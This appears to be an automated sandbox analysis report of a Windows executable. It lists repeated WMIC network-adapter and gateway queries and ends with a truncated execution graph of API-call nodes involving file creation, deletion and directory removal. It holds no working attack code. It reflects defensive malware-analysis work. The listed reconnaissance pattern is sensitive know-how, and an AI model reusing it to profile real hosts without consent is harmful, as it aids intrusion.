                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                            Start time:11:09:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                            Start time:11:09:10
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                            Start time:11:09:10
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:37
                                                                                                                                                                                                            Start time:11:09:22
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                            Start time:11:09:23
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:11:09:24
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:40
                                                                                                                                                                                                            Start time:11:09:24
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:42
                                                                                                                                                                                                            Start time:11:09:38
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                            Start time:11:09:38
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:44
                                                                                                                                                                                                            Start time:11:09:40
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                            Start time:11:09:40
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                            Start time:11:09:53
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                            Start time:11:09:53
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                            Start time:11:09:55
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                            Start time:11:09:55
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                            Start time:11:10:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                            Imagebase:0xc40000
                                                                                                                                                                                                            File size:427'008 bytes
                                                                                                                                                                                                            MD5 hash:E2DE6500DE1148C7F6027AD50AC8B891
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                            Start time:11:10:08
                                                                                                                                                                                                            Start date:01/05/2024
                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:14.9%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:8.4%
                                                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                                                              Total number of Limit Nodes:50
                                                                                                                                                                                                              execution_graph 17557 bc08fc 17558 bc0900 17557->17558 17559 bc0903 VirtualAlloc 17557->17559 17560 bbbadb 17562 bbbae9 17560->17562 17561 bbbbd2 17562->17561 17564 bbbaa0 71 API calls 17562->17564 17565 bbb909 17562->17565 17564->17562 17566 bbb915 17565->17566 17569 bc6655 17566->17569 17567 bbb979 17567->17562 17627 bd9176 17569->17627 17571 bc6664 EnterCriticalSection LeaveCriticalSection 17572 bc668c 17571->17572 17584 bc6682 17571->17584 17628 bb16b8 17572->17628 17575 bc66cc 17578 bb17ef 16 API calls 17575->17578 17576 bc66da 17619 bc66e1 17576->17619 17746 bb18ab SysStringLen 17576->17746 17577 bb6bb6 VariantClear 17577->17584 17579 bc66d8 17578->17579 17631 bb17ef 17579->17631 17582 bc6705 17635 bb6bb6 17582->17635 17584->17567 17586 bc67a8 17589 bb6bb6 VariantClear 17586->17589 17587 bc679b 17588 bb6bb6 VariantClear 17587->17588 17588->17619 17590 bc67c0 17589->17590 17590->17619 17639 bb6a33 17590->17639 17592 bc681b 17592->17619 17653 bb1759 17592->17653 17594 bc685e 17656 bb1614 17594->17656 17595 bc6838 17595->17594 17750 bc65fa 17595->17750 17598 bc6872 17599 bc68a8 17598->17599 17600 bc6878 17598->17600 17605 bb16b8 16 API calls 17599->17605 17601 bb17ef 16 API calls 17600->17601 17602 bc6886 17601->17602 17603 bc688c 17602->17603 17604 bc6895 17602->17604 17758 bb25be 17603->17758 17764 bb251e 17604->17764 17608 bc68bb 17605->17608 17659 bb3138 17608->17659 17610 bc68cb 17611 bc68ed 17610->17611 17769 bb2848 17610->17769 17622 bc69b4 17611->17622 17727 bcc0bb 17611->17727 17615 bb17ef 16 API calls 17625 bc69df 17615->17625 17616 bc68db 17780 bb190a 17616->17780 17617 bc68fe 17737 bb227e 17617->17737 17619->17577 17622->17615 17623 bc6944 17624 bb190a 16 API calls 17623->17624 17624->17619 17626 bb6bb6 VariantClear 17625->17626 17626->17584 17627->17571 17784 bcc081 17628->17784 17630 bb16c5 17630->17575 17630->17576 17630->17619 17632 bb17fb 17631->17632 17634 bb181c __InternalCxxFrameHandler 17631->17634 17633 bcc081 16 API calls 17632->17633 17632->17634 17633->17634 17634->17582 17636 bb6bd3 VariantClear 17635->17636 17638 bb6bbe 17635->17638 17637 bb6bda 17636->17637 17637->17584 17637->17586 17637->17587 17637->17619 17638->17636 17638->17637 17640 bb6a3f 17639->17640 17641 bb6ad8 17640->17641 17642 bb16b8 16 API calls 17640->17642 17641->17592 17648 bb6a60 17642->17648 17643 bb6ab2 17644 bb184f 16 API calls 17643->17644 17645 bb6ac6 17644->17645 17646 bb1d74 16 API calls 17645->17646 17649 bb6acd 17646->17649 17648->17643 17914 bb184f 17648->17914 17918 bb1d74 17648->17918 17926 bb1d35 17648->17926 17651 bb1d35 16 API calls 17649->17651 17651->17641 17935 bb1533 17653->17935 17655 bb1769 __InternalCxxFrameHandler 17655->17595 17657 bb1533 16 API calls 17656->17657 17658 bb162b __InternalCxxFrameHandler 17657->17658 17658->17598 17660 bb3144 17659->17660 17699 bb336b 17660->17699 17953 bb16dc 17660->17953 17661 bb3401 17666 bb3423 17661->17666 17667 bb341e 17661->17667 17674 bb3452 17661->17674 17662 bb33b0 17976 bb30f3 17662->17976 17665 bb31d2 17669 bb16dc 16 API calls 17665->17669 17680 bb3353 17666->17680 17938 bb2efc 17666->17938 17671 bb30f3 22 API calls 17667->17671 17668 bb33b7 17668->17666 17672 bb33cb 17668->17672 17677 bb31df 17669->17677 17671->17666 17982 bb1787 17672->17982 17674->17666 17685 bb347d 17674->17685 17675 bb353a 17675->17680 17681 bb3542 FindClose 17675->17681 17689 bb3222 17677->17689 17957 bb1a00 17677->17957 17678 bb3532 17683 bb3583 31 API calls 17678->17683 17680->17610 17681->17680 17682 bb33e0 17986 bb3583 17682->17986 17683->17675 17687 bb3583 31 API calls 17685->17687 17691 bb3485 17687->17691 17688 bb3269 17692 bb3138 52 API calls 17688->17692 17689->17688 17702 bb3244 17689->17702 17690 bb33fc 17690->17680 17693 bb3499 17691->17693 17694 bb3489 17691->17694 17696 bb3274 17692->17696 17695 bb16dc 16 API calls 17693->17695 17697 bb1787 16 API calls 17694->17697 17698 bb34a2 17695->17698 17696->17699 17700 bb3267 17696->17700 17697->17690 17997 bb12c1 17698->17997 17699->17661 17699->17662 17703 bb1759 16 API calls 17700->17703 17702->17700 17705 bb17ef 16 API calls 17702->17705 17706 bb329e 17703->17706 17705->17700 17707 bb16b8 16 API calls 17706->17707 17723 bb32aa 17707->17723 17708 bb12c1 16 API calls 17709 bb34bb 17708->17709 17710 bb2efc 32 API calls 17709->17710 17715 bb34cb 17710->17715 17712 bb30f3 22 API calls 17714 bb3327 SetLastError 17724 bb32ee 17714->17724 17715->17712 17717 bb3555 17715->17717 17719 bb32f0 17973 bb19c5 17719->17973 17723->17714 17723->17719 17723->17724 17725 bb16b8 16 API calls 17723->17725 17961 bb2da6 17723->17961 17965 bb30b0 17723->17965 17724->17680 17726 bb334a FindClose 17724->17726 17725->17723 17726->17680 17731 bcc0c0 17727->17731 17728 bd0563 ___std_exception_copy 15 API calls 17728->17731 17729 bcc0da 17729->17617 17730 bd057d __dosmaperr 2 API calls 17730->17731 17731->17728 17731->17729 17731->17730 17733 bcc0dc 17731->17733 17732 bcc5be 17734 bceddc CallUnexpected RaiseException 17732->17734 17733->17732 17736 bceddc CallUnexpected RaiseException 17733->17736 17735 bcc5db 17734->17735 17735->17617 17736->17732 18128 bb22ef 17737->18128 17740 bb22c9 CreateFileW 17742 bb22e4 17740->17742 17741 bb2299 17743 bb1bb2 20 API calls 17741->17743 17742->17622 17742->17623 17744 bb22a4 CreateFileA 17743->17744 17747 bb18c1 17746->17747 17749 bb18d8 __InternalCxxFrameHandler 17746->17749 17748 bcc081 16 API calls 17747->17748 17748->17749 17749->17579 17751 bc6606 17750->17751 17752 bb1759 16 API calls 17751->17752 17753 bc6612 17752->17753 17754 bc6644 17753->17754 17755 bb19c5 16 API calls 17753->17755 17757 bb12c1 16 API calls 17753->17757 18131 bb2603 17753->18131 17754->17594 17755->17753 17757->17753 17759 bb25cd 17758->17759 17760 bb25f0 RemoveDirectoryW 17758->17760 17761 bb1bb2 20 API calls 17759->17761 17762 bb25ea 17760->17762 17763 bb25d8 RemoveDirectoryA 17761->17763 17762->17619 17763->17762 17765 bb2533 CreateFileW 17764->17765 17766 bb2527 SetLastError 17764->17766 17767 bb256e 17765->17767 17768 bb2555 SetFileTime CloseHandle 17765->17768 17766->17765 17766->17767 17767->17619 17768->17767 17770 bb30f3 22 API calls 17769->17770 17771 bb2856 17770->17771 17772 bb2871 17771->17772 18138 bb2575 17771->18138 17773 bb289f DeleteFileW 17772->17773 17774 bb287e 17772->17774 17777 bb28a8 17772->17777 17773->17777 17776 bb1bb2 20 API calls 17774->17776 17778 bb2888 DeleteFileA 17776->17778 17777->17611 17777->17616 17779 bb289a 17778->17779 17779->17777 17781 bb191d 17780->17781 17781->17781 17782 bcc081 16 API calls 17781->17782 17783 bb1940 17781->17783 17782->17783 17783->17619 17786 bcc0bb 17784->17786 17787 bcc0da 17786->17787 17789 bcc0dc 17786->17789 17794 bd0563 17786->17794 17801 bd057d 17786->17801 17787->17630 17790 bcc5be 17789->17790 17804 bceddc 17789->17804 17791 bceddc CallUnexpected RaiseException 17790->17791 17793 bcc5db 17791->17793 17793->17630 17799 bd277d __dosmaperr 17794->17799 17795 bd27bb 17807 bd1b8b 17795->17807 17797 bd27a6 RtlAllocateHeap 17798 bd27b9 17797->17798 17797->17799 17798->17786 17799->17795 17799->17797 17800 bd057d __dosmaperr 2 API calls 17799->17800 17800->17799 17903 bd05aa 17801->17903 17805 bcedf6 17804->17805 17806 bcee23 RaiseException 17804->17806 17805->17806 17806->17790 17810 bd20cb GetLastError 17807->17810 17809 bd1b90 17809->17798 17811 bd20e2 17810->17811 17814 bd20e8 17810->17814 17833 bd247b 17811->17833 17830 bd20ee SetLastError 17814->17830 17838 bd24ba 17814->17838 17819 bd211e 17822 bd24ba __dosmaperr 6 API calls 17819->17822 17820 bd2135 17821 bd24ba __dosmaperr 6 API calls 17820->17821 17823 bd2141 17821->17823 17824 bd212c 17822->17824 17825 bd2145 17823->17825 17826 bd2156 17823->17826 17852 bd1bfb 17824->17852 17828 bd24ba __dosmaperr 6 API calls 17825->17828 17858 bd1da1 17826->17858 17828->17824 17830->17809 17832 bd1bfb _free 12 API calls 17832->17830 17863 bd22db 17833->17863 17836 bd24a0 17836->17814 17837 bd24b2 TlsGetValue 17839 bd22db __dosmaperr 5 API calls 17838->17839 17840 bd24d6 17839->17840 17841 bd2106 17840->17841 17842 bd24f4 TlsSetValue 17840->17842 17841->17830 17843 bd1b9e 17841->17843 17844 bd1bab 17843->17844 17845 bd1beb 17844->17845 17846 bd1bd6 HeapAlloc 17844->17846 17850 bd1bbf __dosmaperr 17844->17850 17848 bd1b8b _free 13 API calls 17845->17848 17847 bd1be9 17846->17847 17846->17850 17849 bd1bf0 17847->17849 17848->17849 17849->17819 17849->17820 17850->17845 17850->17846 17851 bd057d __dosmaperr 2 API calls 17850->17851 17851->17850 17853 bd1c06 RtlFreeHeap 17852->17853 17857 bd1c2f _free 17852->17857 17854 bd1c1b 17853->17854 17853->17857 17855 bd1b8b _free 12 API calls 17854->17855 17856 bd1c21 GetLastError 17855->17856 17856->17857 17857->17830 17877 bd1c35 17858->17877 17864 bd2309 17863->17864 17867 bd2305 17863->17867 17864->17867 17870 bd2214 17864->17870 17867->17836 17867->17837 17868 bd2323 GetProcAddress 17868->17867 17869 bd2333 __dosmaperr 17868->17869 17869->17867 17871 bd2225 ___vcrt_FlsGetValue 17870->17871 17872 bd22d0 17871->17872 17873 bd2243 LoadLibraryExW 17871->17873 17875 bd22b9 FreeLibrary 17871->17875 17876 bd2291 LoadLibraryExW 17871->17876 17872->17867 17872->17868 17873->17871 17874 bd225e GetLastError 17873->17874 17874->17871 17875->17871 17876->17871 17878 bd1c41 CallCatchBlock 17877->17878 17891 bd280c EnterCriticalSection 17878->17891 17880 bd1c4b 17892 bd1c7b 17880->17892 17883 bd1d47 17884 bd1d53 CallCatchBlock 17883->17884 17895 bd280c EnterCriticalSection 17884->17895 17886 bd1d5d 17896 bd1f28 17886->17896 17888 bd1d75 17900 bd1d95 17888->17900 17891->17880 17893 bd2854 IsInExceptionSpec LeaveCriticalSection 17892->17893 17894 bd1c69 17893->17894 17894->17883 17895->17886 17897 bd1f5e __dosmaperr 17896->17897 17898 bd1f37 __dosmaperr 17896->17898 17897->17888 17898->17897 17899 bd457f __dosmaperr 14 API calls 17898->17899 17899->17897 17901 bd2854 IsInExceptionSpec LeaveCriticalSection 17900->17901 17902 bd1d83 17901->17902 17902->17832 17904 bd05b6 CallCatchBlock 17903->17904 17909 bd280c EnterCriticalSection 17904->17909 17906 bd05c1 17910 bd05fd 17906->17910 17909->17906 17913 bd2854 LeaveCriticalSection 17910->17913 17912 bd0588 17912->17786 17913->17912 17915 bb185c 17914->17915 17917 bb1874 __InternalCxxFrameHandler 17914->17917 17916 bcc081 16 API calls 17915->17916 17916->17917 17917->17648 17919 bb1d9f 17918->17919 17920 bb1d81 17918->17920 17919->17648 17921 bb1d8a 17920->17921 17922 bb1da2 17920->17922 17932 bb1db8 17921->17932 17924 bceddc CallUnexpected RaiseException 17922->17924 17925 bb1db7 17924->17925 17927 bb1d41 17926->17927 17928 bcc0bb 16 API calls 17927->17928 17929 bb1d4a 17928->17929 17930 bb1759 16 API calls 17929->17930 17931 bb1d5c 17930->17931 17931->17648 17933 bcc081 16 API calls 17932->17933 17934 bb1dd7 __InternalCxxFrameHandler 17933->17934 17934->17919 17936 bcc081 16 API calls 17935->17936 17937 bb1555 17936->17937 17937->17655 18001 bb2edd 17938->18001 17941 bb2f87 18019 bcbe6f 17941->18019 17942 bb2f69 FindFirstFileW 17942->17941 17945 bb2f7c 17942->17945 17943 bb2f33 18004 bb1bb2 17943->18004 18016 bb2e0d 17945->18016 17949 bb2f9e 17949->17675 17949->17678 17954 bb16ee 17953->17954 17955 bb1533 16 API calls 17954->17955 17956 bb16fb __InternalCxxFrameHandler 17955->17956 17956->17665 17958 bb1a14 17957->17958 18088 bb15aa 17958->18088 17964 bb2db0 17961->17964 17966 bb30be 17965->17966 17967 bb30c5 17965->17967 17977 bb3102 17976->17977 17978 bb3125 GetFileAttributesW 17976->17978 17979 bb1bb2 20 API calls 17977->17979 17978->17668 17980 bb310d GetFileAttributesA 17979->17980 17981 bb311f 17980->17981 17981->17668 17983 bb179a 17982->17983 17984 bcc081 16 API calls 17983->17984 17985 bb17bd __InternalCxxFrameHandler 17983->17985 17984->17985 17985->17682 17987 bb358f __EH_prolog3_GS 17986->17987 17988 bb227e 23 API calls 17987->17988 17989 bb35b3 17988->17989 17990 bb35c8 GetFileInformationByHandle 17989->17990 17991 bb35b7 17989->17991 17992 bb35e9 17990->17992 17994 bb35e0 CloseHandle 17990->17994 17991->17992 17993 bb35bd CloseHandle 17991->17993 17993->17992 17994->17992 17998 bb12cc 17997->17998 17999 bb12d1 17997->17999 18120 bb1563 17998->18120 17999->17708 18002 bb2ee5 FindClose 18001->18002 18003 bb2ef1 18001->18003 18002->18003 18003->17941 18003->17942 18003->17943 18005 bb1bbe 18004->18005 18006 bb16dc 16 API calls 18005->18006 18007 bb1bcc AreFileApisANSI 18006->18007 18026 bb2037 18007->18026 18017 bb1787 16 API calls 18016->18017 18018 bb2e61 18017->18018 18018->17941 18020 bcbe78 IsProcessorFeaturePresent 18019->18020 18021 bcbe77 18019->18021 18023 bcbebf 18020->18023 18021->17949 18087 bcbe82 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 18023->18087 18025 bcbfa2 18025->17949 18027 bb2043 18026->18027 18032 bb146b 18027->18032 18033 bcc081 16 API calls 18032->18033 18034 bb1478 18033->18034 18087->18025 18089 bb15f7 18088->18089 18091 bb15c1 18088->18091 18089->17689 18090 bb15fe 18093 bceddc CallUnexpected RaiseException 18090->18093 18091->18090 18092 bb15ec 18091->18092 18096 bb148d 18092->18096 18095 bb1613 18093->18095 18097 bcc081 16 API calls 18096->18097 18098 bb14ad __InternalCxxFrameHandler 18097->18098 18098->18089 18121 bb1581 18120->18121 18122 bb158c 18121->18122 18123 bb1594 18121->18123 18124 bb148d 16 API calls 18122->18124 18125 bceddc CallUnexpected RaiseException 18123->18125 18126 bb1592 18124->18126 18127 bb15a9 18125->18127 18126->17999 18129 bb22f7 FindCloseChangeNotification 18128->18129 18130 bb228c 18128->18130 18129->18130 18130->17740 18130->17741 18130->17742 18132 bb2612 18131->18132 18133 bb2637 CreateDirectoryW 18131->18133 18135 bb1bb2 20 API calls 18132->18135 18134 bb2642 18133->18134 18134->17753 18136 bb261d CreateDirectoryA 18135->18136 18137 bb2631 18136->18137 18137->18134 18139 bb25a9 SetFileAttributesW 18138->18139 18140 bb2587 18138->18140 18142 bb25b3 18139->18142 18141 bb1bb2 20 API calls 18140->18141 18143 bb2591 SetFileAttributesA 18141->18143 18142->17772 18144 bb25a4 18143->18144 18144->18142 18145 bcc47c 18154 bccae7 GetModuleHandleW 18145->18154 18148 bcc488 18152 bcc493 18148->18152 18156 bd1038 18148->18156 18149 bcc4ba 18159 bd1056 18149->18159 18155 bcc484 18154->18155 18155->18148 18155->18149 18162 bd0f2d 18156->18162 18160 bd0f2d IsInExceptionSpec 23 API calls 18159->18160 18161 bcc4c2 18160->18161 18163 bd0f4d 18162->18163 18164 bd0f3b 18162->18164 18180 bd0df3 18163->18180 18165 bccae7 IsInExceptionSpec GetModuleHandleW 18164->18165 18167 bd0f40 18165->18167 18167->18163 18174 